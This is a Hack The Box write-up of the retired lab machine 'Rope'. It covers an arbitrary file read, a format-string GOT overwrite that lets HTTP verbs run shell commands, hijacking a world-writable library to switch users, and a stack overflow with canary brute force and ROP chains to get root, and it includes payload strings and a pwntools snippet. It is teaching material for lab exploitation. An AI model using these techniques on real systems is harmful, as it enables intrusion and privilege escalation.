Hack The Box :: Rope

Rope is an Insane Linux box created by R4J. It was released on August 3rd, 2019 and retired on May 23rd, 2020. The users rated the box difficulty 7.9/10 and gave it an appreciation score of 4.6/5.

TL;DR

We access a dummy HTML page that contains an Arbitrary File Read vulnerability that we use to retrieve the web server binary. It happens to be a modified version of tiny-web-server. With static and dynamic binary analysis, we find and exploit a Format String vulnerability and use it to upload our SSH public-key in john home folder to have SSH access. We are helped by the very first vulnerability to read /proc/self/map and retrieve the binary and Libc base addresses. john is a sudoer and can run a custom binary readlogs as r4j. One of the shared libraries used by the binary is world-writable. We replace the existing one with our own library that spawns a shell as r4j to get the user flag. An internal service runs as root and listens on port 1337. We grab once again the binary for analysis. We spot a Stack Buffer Overflow (BOF). We bypass the canary, NX and ASLR/PIE to get a shell as root and grab the final flag. This time we can leak a Libc address but we retrieve the binary base address from /var/log/kern.log.

A user on Discord reported an error in my write-up. What I mentioned as a Local File Inclusion (LFI) is in fact an Arbitrary File Read/Disclosure. The difference being that an LFI includes a file as an executable script. Here we can only read the content of a file. Thanks pql for your review!

Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

$ sudo nmap -sS -sV 10.10.10.148

PORT	STATE	SERVICE	VERSION
22/tcp	open	ssh	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9999/tcp	open	abyss?

We discover:

the usual OpenSSH 7.6p1 on the default port,
a service running on port 9999 that is not recognized but that is a simple web server.

Web discovery

The website shows a login page. However, this is a dummy static HTML page:

A folder/file discovery only shows a basic file structure, however, a Nikto scan outputs more interesting stuff:

$ nikto --host http://10.10.10.148:9999
[…]
+ Server banner has changed from '' to 'simple http server' which may suggest a WAF, load balancer or proxy is in place
[…]
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
[…]

There is an Arbitrary File Read vulnerability that we can use to read files with the service account access rights:

By browsing the server’s files, we come across the server binary called httpserver in /opt/www that we can download for analysis:

Let’s grab as well a the OS information:

Gaining Access

The binary is 32-bit and not stripped, which may facilitate the analysis:

$ file httpserver
httpserver: ELF 32-bit LSB shared object Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=e4e105bd11d096b41b365fa5c0429788f2dd73c3, not stripped

We will be using both static analysis with Ghidra and dynamic analysis on an Ubuntu 18.04.3 LTS box with pwndbg.

Static Analysis

We load our binary in Ghidra and start with the main function. The main function is quite basic and after some data initialization, it starts a listener and loops infinitely to accept and process user requests:

The process function forks the process then parses the user request. If a file is requested, it is displayed with serve_static and if it is a directory, it is listed with handle_directory_request. Finally, the access is logged on the server-side with log_access:

We won’t go deeper into the analysis because when we look at the function’s names and we do a quick internet search, we find out that this is not a custom code but has been borrowed from tiny-web-server. We now have the original source code that facilitates the analysis even more.

The last version of the code is 7 years old and was not meant to be used in production. Its main use is as a “lightweight file browser” and it was developed with no security checks:

We find as well a POC for a Buffer Overflow. The function url_decode does not check some buffer size before copying the file name:

However, when looking at the decompiled code, we see that this has been patched. The buffer is now 2048 bytes big:

This buffer is then passed as argument to parse_request and then to url_decode. What has been patched in fact is the http_request structure:

Next step, compare the original source code with the Ghidra decompiled code. We seen that another change has been performed, this time in the log_access function and this introduced a new vulnerability:

This change introduced a Format String vulnerability. The printf function takes a user-controlled variable (the requested filename) as the only argument. If we request a filename like %x (a format string), as there is no second argument to the function, a value of the stack will be read instead.

It is time to switch to dynamic analysis.

Dynamic Analysis

On our Ubuntu box, the first thing we can check is if the binary has been compiled with hardening options with checksec from pwntools:

There are quite some protections:

Partial RELRO sets the .got section as read-only, however, the section .got.plt (PLT-dependent GOT) stays writable. You can find here a good explanation of those different binary sections,
The Stack Canary prevents stack buffer overflows by initializing a random value (canary) and pushing it on the stack when we enter a function. Prior to the function return, the canary is checked and if it has been modified (by a buffer overflow), the program aborts,
NX sets the stack as non-executable,
PIE, or Position Independent Executable, loads the binary and all its dependencies at a random address in memory at each restart.

For the rest of this write-up, I will be using GOT to refer to the PLT-dependent GOT.

Let’s run the binary and see how it behaves when we use a format string as filename:

We can see that we can fool the function printf in believing it has multiple parameters that will be picked from the stack. If we continue reading the stack value, we will start seeing our payload (we add 4 leading A to find it more easily):

We can see our As (0x41414141) followed by our repeated pattern '%x ' (0x207825). Format strings permit as well to select a specific argument. For instance printf("% 3$i", 1, 2, 3) will print the 3rd argument 3. If we count the stack values, we see that our payload is at offset 53 on the stack. Therefore, we can simply print our As on the stack with %53$x:

How is this useful to us? Well, the beauty of format strings is that we can not only read values on the stack, but we can as well write at any address of the binary as long as the section is writable. How? With the %n specifier.

If we take our previous payload and simply replace the %x with %n, it will write the number of bytes read so far (our 4 As) at the address 0x41414141. As we control this address value, we can write anywhere. Another feature of format strings is that we can use padding to write big numbers of characters at once. For instance, %1000x will write 1000 characters so AAAA%1000x%53$n will write 0x3ec (1000+4) at 0x41414141.

Now if we want to write a binary address that looks like 0x87654321 we need to write 2'271'560'481 which is quite a lot! We can use yet another format string feature to write this address in 2 times. We will first write 0x4321 (17185) characters to the lower 2 bytes of the address with the specifier %hn and then write 0x8765 (34661) characters to the higher 2 bytes with the same specifier. We can even break this into 4 writes with the specifier %hhn that writes only 1 byte at a time. Such payload would look like:

AAAAAAAAC%17177x%53$hn%17476x%54$hn

We first add the 2 addresses where we want to write 0x41414141 (AAAA) for the lower 2 bytes and 0x41414141+2 (CAAA) for the higher 2 bytes. Then as we already wrote 8 bytes, we need to adjust the number of characters to write at 0x41414141 17185 — 8 = 17177 and the same at 0x4141414C 34661 — 17185 = 17476. Finally, we need to increase the stack offset by one for the second write.

You can find some good resources on format string vulnerabilities on Internet and Youtube. I recommend watching LiveOverflow & Gynvael videos [5].

Local Exploitation w/o randomization

Now that we have a fairly good idea of how to exploit this Format String vulnerability, we need to decide what we write and where. As the binary uses Partial RELRO, we could rewrite the entry of a function in the GOT like puts (which is the next function called after printf) to point on any function of the Libc like system. Let’s analyze this in a debugger.

Let’s download the version of the 32-bit version of the Libc used on the server first so we work with the right offsets from the start:

$ wget http://10.10.10.148:9999//lib32/libc-2.27.so -O ./libc.so.6

To ease the debugging, we can deactivate the binary randomization first (ASLR + PIE) so our breakpoints will always be at the same address:

$ echo "0" | sudo tee /proc/sys/kernel/randomize_va_space

Then we launch httpserver with the server Libc version, get its PID and attach the debugger to it:

$ LD_PRELOAD=./libc.so.6 ./httpserver &
$ ps -aux | grep httpserver | head -n 1
noob 6028 0.0 0.0 2380 492 pts/1 S+ 21:42 0:00 ./httpserver
$ sudo gdb -p 6028 // do it from another tab

We can now get the GOT entry of puts and the address of system in the Libc used:

All the exploit scripts of this write-up will be using Python2

We can now build an intermediary exploit to see how all this behaves:

Back on pwngdb, let’s set a breakpoint on the vulnerable printf and resume the process:

pwndbg> b *0x565570ec
Breakpoint 1 at 0x565570ec
pwndbg> continue
Continuing

Fire the exploit and verify that the GOT entry of puts has been rewritten with the address of system after the printf call:

Good, it worked! Now, when we detach our debugger, a system call is performed server-side…and even more than one:

This is normal as there are 3 calls to puts done with different arguments:

The first system call does nothing. The second one executes /bin/sh -c request method: and returns an error, the third one executes /bin/sh -c GET which is a valid command and shows the command help. By the way, we can see that the http_request structure has been modified to add the HTTP verb.

As we have control over the HTTP verb and that there are not checks, we can try to execute other commands by calling curl instead of using the requests lib (that converts the custom verb we use to uppercase). For instance, if we call curl with the method id, we get:

Using payloads with spaces does not work but this can be bypassed by replacing spaces with ${IFS}. With a verb cat${IFS}/etc/passwd, we get:

Remote exploitation w/ randomization

Now that we have code execution without ASLR and PIE, it is time to think about how to get the address of system in the Libc and the GOT entry of puts with randomization on the remote server.

We can get the offset of system in the server’s Libc by querying the symbols_:_

And for the offset of the puts GOT entry, we can query the relocation table of the binary:

At this point, we only miss the dynamic base addresses of the binary and of the Libc. It took quite some time to realize, but we can use the server’s feature (or vulnerability?) that we discovered initially and that allows us to read files of the server to get the information we need.

The /proc/[pid]/maps file contains the mapped memory regions and access permissions of a process. As we do not know the pid of the running binary, we can read /proc/self/maps that resolves to the current process maps file:

Its size is 0 and this is normal as it is only a pointer to where the actual process information resides (see [7]). It’s nevertheless readable from a shell. However, the web server relies by default on this value (reported by fstat()) to output the content and therefore shows an empty file.

Back to the original source code. The http_request structure has 2 other members: offset and end. They are used in parse_request() to handle the Range HTTP header. They default both to 0 and end is updated with the size reported by fstat(). However, if the Range header is set, offset and end will be updated accordingly and will take over the value reported by fstat():

Finally, serve_static() outputs the file using sendfile() and uses those 2 values to know how many bytes need to be shown:

We can test this with a curl call:

We now have all the ingredients for the final payload that will do the following:

read the process self maps to get the binary and Libc base addresses,
compute the address of the GOT entry for puts and of system in the Libc,
use curl to overwrite the puts GOT entry with the address of system to execute our payload.

I tried many different reverse shell payloads and none worked. The best I could get was a connection back but with no output. In the end, what worked was to copy an SSH public-key in john home folder. This is the whole exploit:

We just need to start our HTTP listener to serve the SSH public-key and then launch the exploit:

We now have a shell on the server! But we are not yet halfway through the box!

Local Reconnaissance & Enumeration

The first thing to notice is that the box responds very slowly and it seems on purpose.

Then we see that the user john is a sudoer and can run a binary as the user r4j:

This binary reads the 10 last lines of /var/log/auth.log:

We copy the binary to our box to analyze it with Ghidra. There is only 1 call to printlog() function:

This function is imported from the library liblog.so that we retrieve as well:

Again, the code is pretty simple:

There is nothing to exploit in the binary itself. However, when we look at the library access rights, we see that it os world-writable and that we can actually rewrite it with our own library:

We can not simply write our library and load it with LD_PRELOAD as it is not allowed with sudo by default.

By enumerating more, we find as well a local service listening on port 1337:

We can query it with Netcat to send basic messages to the admin:

In the process list, we see it runs with root privileges:

Privilege Escalation

User pivoting

We can spawn a shell as r4j through the readlogs binary by creating a liblog.so library. We can use the following code that spawns a shell:

We compile the library, copy it in place of the existing one and execute readlogs to get the user flag

We can eventually copy our SSH public-key in r4j home folder too.

Glad to see that not everything is insane in this box :)

Root escalation

Let’s retrieve the /opt/support/contact binary for analysis (user r4j has access as he is in the adm group). The binary is 64-bit and symbols are stripped:

$ file /opt/support/contact
/opt/support/contact: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=cc3b330cabc203d0d813e3114f1515b044a1fd4f, stripped

We can as well retrieve the server’s Libc for further usage:

$ ldd /opt/support/contact
linux-vdso.so.1 (0x00007fff27556000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2de1c68000)
/lib64/ld-linux-x86–64.so.2 (0x00007f2de2059000)

We will be using a similar analysis strategy as for httpserver.

Static Analysis

In Ghidra, we see that the code is pretty short and straightforward. There are 4 main functions (I have renamed them for better readability). The main() function sets up the listener and starts accepting client connections then forks:

The forkProcess() function creates a child process to interact with the client. It outputs some text and reads the user input:

The last piece is the readInput() function that…well…reads the user input. And this is where lies a vulnerability:

Up to 1024 bytes are read from the user input and stored in a 56 byte long buffer…which leads to a Stack Buffer Overflow (BOF) ¯_(ツ)_/¯

If you want to understand the theory behind Stack BOF, you can watch this great Youtube video.

Dynamic Analysis

Back to our Ubuntu box. Let’s first check what are the binary protections:

We see the same protections as httpserver. However, to exploit a Stack BOF in this situation, we need to bypass first the canary, then NX and PIE.

Let’s test the binary:

As long as we input 56 characters or less, everything goes well and we get the Done. message. But if we send more, we overwrite the canary on the stack and we get the error:

*** stack smashing detected ***

We can attach our debugger to the process (as with httpserver) to have a view on that. However, as there are no symbols, we first need to get the offset of the recv call and add it to the binary base address to set our breakpoint:

$ objdump -d contact | grep '<recv@plt>'
0000000000001030 <recv@plt>:
15c7: e8 64 fa ff ff callq 1030 <recv@plt>

In pwngdb, once attached, we can use vmmap to read the base address:

So we can set a breakpoint at 0x555555554000+0x15c7 = 0x5555555555c7, resume the execution and fire our Python payload. Once we execute the recv and look at the stack:

We see that the least significant byte of the canary has been overwritten with our payload a. There are 2 generic ways to bypass a stack canary:

another vulnerability like a format string can leak it, as the canary is on the stack,
we brute-force it byte by byte.

The brute-force works only if the vulnerability is in a forked child process as this does not make the parent crash and as the canary is inherited from the parent, it never changes. Which is totally the case here. Of course, if the parent crashes, the canary is reset. Additional information about bypassing canaries at [9].

During the brute-force, to know if we have found the right byte, we simply check if we receive the Done. message, proof that we haven’t crashed the child process.

At this point, the payload will look like this:

[ garbage (56B) | canary (8B) | rest of payload ]

We can continue the analysis to see how the rest of the payload affects the flow. As we have not leaked the canary yet, we can patch it on the fly for the check to pass. Let’s send the payload above like this:

$ python3 -c 'print("a"*56 + "b"*8 + "abcdefghijklmnopqrstuvwxyz", end="")' | nc 127.0.0.1 1337

Once the recv call is done, the canary is checked:

We can patch JE to JNE:

pwndbg> x 0x5555555555da
0x5555555555da: 0x8fe80574 <- 0x74 is JE opcode
pwndbg> set {int}0x5555555555da=0x8fe80575 <- 0x75 is JNE opcode

Once the check is passed, we see that the return address points back to our payload, 9th bytes after the canary:

We have control over the RIP! We can update our payload too:

[ garbage (56B) | canary (8B) | garbage (8B) | rest of payload ]

What will be the second part of the payload? We cannot return-to-shellcode as the stack is non-executable (NX). We could return-to-libc to execute a system('/bin/sh') call but we need to first leak a Libc address as ASLR randomizes its address. Moreover, to interact with a shell in our configuration we need to redirect _I/O_s through the file descriptor used by the binary. Fortunately, they are static and given when we launch the binary:

To leak the Libc address, we could use the available write function to leak this address through the GOT. Let’s leak for instance the pointer to send. We will need therefore to leak the binary base address as well to call write.

This will involve using a Return Oriented Programming (ROP) chain twice. Once to leak the Libc address and another one for the return-to-libc:

I won’t go into the theory of Return Oriented Programming here. You can find some resources in [10] if needed.

There are quite some similarities with my previous write-up on Patents here. The two ROP chains will be quite similar.

Local Exploitation w/o randomization

Let’s disable again ASLR locally:

$ echo "0" | sudo tee /proc/sys/kernel/randomize_va_space

canary bypass:

Let’s start with the canary brute-force code. It is pretty straight-forward. We add one byte to our first 56 bytes of garbage and try all possible values until we find the byte that returns the Done. message which means that we have found the first byte of the canary. We redo that until we have found the 8 bytes of the canary:

The output will look like:

This code works locally as well as to attack the service on the server and is not ASLR dependent.

libc leak:

Next step is to leak a Libc address by calling write. The call should look like:

1

write(SOCKFD, got.send, 8)

where SOCKFD is the file descriptor used by the child process (4), got.send is the address of send in the GOT, and 8 is the number of bytes we want to write. As per x86–64 calling convention, the first parameter is passed through the RDI register, the second through RSI and the 3rd through RDX. Therefore, in order to build our ROP chain, __ we need to find 3 gadgets to pop those values in the right registers. The chain will look like:

pop rdi; ret
SOCKFD
pop rsi; ret
got.send
pop rdx; ret
call write

Let’s get all those offsets. To search for the ROP gadgets, we can use ROPgadget:

We have not found a pop rsi; ret gadget, instead, we got a pop rsi; pop r15; ret which means that we need to add a dummy 8 bytes value that will be popped in the r15 register…but it will not be used.

We have now all the offsets, but we still do not know the binary base address lat this point. With ASLR disabled, this one is constant and is 0x555555554000. We can hardcode it for the time being. We can add the following code to our exploit:

We can launch the binary with the 64-bit Libc version we downloaded from the server:

$ LD_PRELOAD=./libc.so.6 ./contact

And run our new exploit version. As we already got the canary, we can hardcode it (as long as we haven't restarted the service). The output is:

system shell:

We will construct this ROP chain differently, by using pwntools magic. The important thing here is to first redirect stdin, stdout and stderr though the child process file descriptor so we can interact with the shell. This can be easily achieved with the dup2 function. This function takes 2 file descriptors as arguments:

1

int dup2(int oldfd, int newfd);

The newfd will be a copy of oldfd and both of them can be used interchangeably.

So, we need to call dup2 3 times, then system("/bin/sh"). With pwntools, we construct the ROP chain as follows:

1
2
3
4
5


rop = ROP(libc)  
rop.dup2(SOCKFD, 0) # STDIN  
rop.dup2(SOCKFD, 1) # STDOUT  
rop.dup2(SOCKFD, 2) # STDERR  
rop.system(next(libc.search("/bin/sh")))

Then construct our payload and send it as for the Libc leak. This works well and we get a shell locally.

Remote Exploitation w/ randomization

The code is quite ready to work with ASLR enabled to attack the remote server. The only unknown value at this point is the remote binary base address as PIE is enabled.

I was not able (or good enough) to leak it remotely but we still have local access to the box. We cannot read the /proc/$pid/maps file this time as the service runs as root but we remember that the user r4j is part of the adm group. Let’s search for the files he can read:

The kern.log file is interesting as this is where the kernel logs crash information like segmentation faults. Let’s check if we get valuable information from it, but first, we need to make a child process crash once. To do so, we only need to brute-force the canary and send garbage afterward.

We kill our local contact instance and expose the remote service with an SSH port forwarding:

ssh -L 1337:localhost:1337 -i rope_rsa john@10.10.10.148

Then we run our canary brute force script as-is. It still points to localhost:1337 which will be now forwarded to the remote box. This takes around 10 minutes as the server still responds slowly.

Then we can re-use the second Python code a few times with dummy long strings after the canary value to get a segfault:

In the kern.log file we can read:

The addresses in red are addresses of the binary where the segfault happened. If I am not mistaken, binary base addresses are always multiple of 0x1000. So we can start from one of the values in red, and decrease the base address by 0x1000 until we get the Libc leak and therefore, a system shell:

This is the full exploit code:

Conclusion

What an incredible and challenging box made by R4J!! It is currently in my Top 3 boxes along with Patents (read my write-up) and PlayerTwo (my write-up)!

Some takeaways of this pentest:

use open source tools that are still maintained and that are backed by a strong community,
review regularly world-writable files on your system,
learn about C/C++ potential weaknesses. You can start with CWE here and here.

Resources

[1] Ghidra
https://ghidra-sre.org/

[2] pwndbg
https://github.com/pwndbg/pwndbg

[3] tiny-web-server
https://github.com/shenfeng/tiny-web-server

[4] tiny-web-server buffer overflow
https://surfingthecyber.com/2017/11/10/tiny-web-server-buffer-overflow-discovery-and-poc.html

[5] Format String vulnerability basics
https://www.youtube.com/watch?v=0WvrSfcdq1I
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.youtube.com/watch?v=MBz5C9Wa6KM
https://www.youtube.com/watch?v=xAdjDEwENCQ
http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
https://n00bsec.github.io/update/post/exploitation/reverse-engineering/stringformat/2017/09/28/LearningFormatStringsWithLestrade.html

[6] GOT and PLT for pwning
https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html

[7] Linux process information pseudo-filesystem
http://man7.org/linux/man-pages/man5/proc.5.html
https://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html

[8] Stack Buffer Overflows explained
https://www.youtube.com/watch?v=1S0aBV-Waeo

[9] Stack Canary bypass
https://bananamafia.dev/post/binary-canary-bruteforce/
https://ctf101.org/binary-exploitation/stack-canaries/

[10] ROP VIDEOs
https://www.youtube.com/watch?v=XZa0Yu6i_ew
https://www.youtube.com/watch?v=CbW5TYmWQNU
https://www.youtube.com/watch?v=ruJXvxXzyU8

[11] AMD64 Calling Conventions for Linux / Mac OSX
https://courses.cs.washington.edu/courses/cse378/10au/sections/Section1_recap.pdf

[12] ROPgadget
https://github.com/JonathanSalwan/ROPgadget

[13] Weaknesses in Software Written in C & C++
https://cwe.mitre.org/data/definitions/658.html
https://cwe.mitre.org/data/definitions/659.html

TL;DR

Reconnaissance & Enumeration

Open Ports

Web discovery

Gaining Access

Static Analysis

Dynamic Analysis

Local Exploitation w/o randomization

Remote exploitation w/ randomization

Local Reconnaissance & Enumeration

Privilege Escalation

User pivoting

Root escalation

Static Analysis

Dynamic Analysis

Local Exploitation w/o randomization

Remote Exploitation w/ randomization

Conclusion

Resources

See Also